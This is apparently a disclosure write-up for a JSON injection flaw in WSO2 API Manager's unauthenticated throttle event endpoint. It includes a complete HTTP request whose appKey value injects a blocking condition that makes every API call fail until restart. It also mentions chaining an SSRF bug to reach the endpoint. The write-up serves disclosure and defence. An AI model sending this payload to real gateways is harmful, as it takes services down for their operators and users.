WSO2 API Manager exposes an unauthenticated HTTP endpoint at /endpoints/throttleEventReceiver that feeds JSON events into the Siddhi CEP engine. The JSONOutputMapper wraps string values in double quotes without escaping, so an attacker-controlled field (appKey) can break the JSON string boundary and inject a second payloadData object containing an arbitrary blocking condition. Jackson's last-value-wins duplicate key resolution causes the injected payload to overwrite the original. A single request is sufficient: Siddhi's emitOnStateChange fires on any new throttleKey, and the injected payloadData substitutes its own "state":"true".
POST /endpoints/throttleEventReceiver HTTP/1.1
Host: target
Content-Type: application/json
{
"event": {
"payloadData": {
"appKey": "\"},\"payloadData\":{\"blockingCondition\":\"IPRANGE\",\"conditionValue\":\"{}\",\"state\":\"true\",\"id\":1,\"tenantDomain\":\"carbon.super\"}}}}",
"appTier": "10PerMin",
"appTenant": "carbon.super"
}
}
}
Within two minutes, every API request on the gateway returns HTTP 500 (NullPointerException in ThrottleConditionEvaluator.isIpLevelBlocked()) until the server is restarted. Replacing the empty conditionValue with a proper IPRANGE (startingIp=0.0.0.0, endingIp=0.0.0.0, invert:true) produces HTTP 403 instead.
In deployments where the management console is not directly exposed, SSRF vulnerabilities such as CVE-2026-2053 can be used to exploit this from the gateway.
This vulnerability was responsibly disclosed and has been patched by the vendor.